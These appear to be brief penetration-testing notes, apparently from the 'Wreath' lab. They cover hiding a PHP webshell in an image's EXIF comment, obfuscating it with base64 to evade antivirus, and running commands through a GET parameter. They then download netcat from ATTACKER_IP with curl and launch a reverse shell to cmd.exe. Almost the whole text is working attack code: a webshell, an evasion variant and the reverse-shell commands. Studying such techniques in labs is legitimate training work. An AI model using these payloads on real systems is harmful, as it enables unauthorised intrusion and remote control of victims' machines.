909 B
909 B
PHP Payload in Image ExifData
- Test
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
- Build Payload with AV evasion
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
-
Obfuscated code with escaped
$
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
- Upload and execute commands with get parameter
?wreath=systeminfo
Uploading Reverse through Webshell
- Parameter for Webshell
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
- Trigger uploaded netcat
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe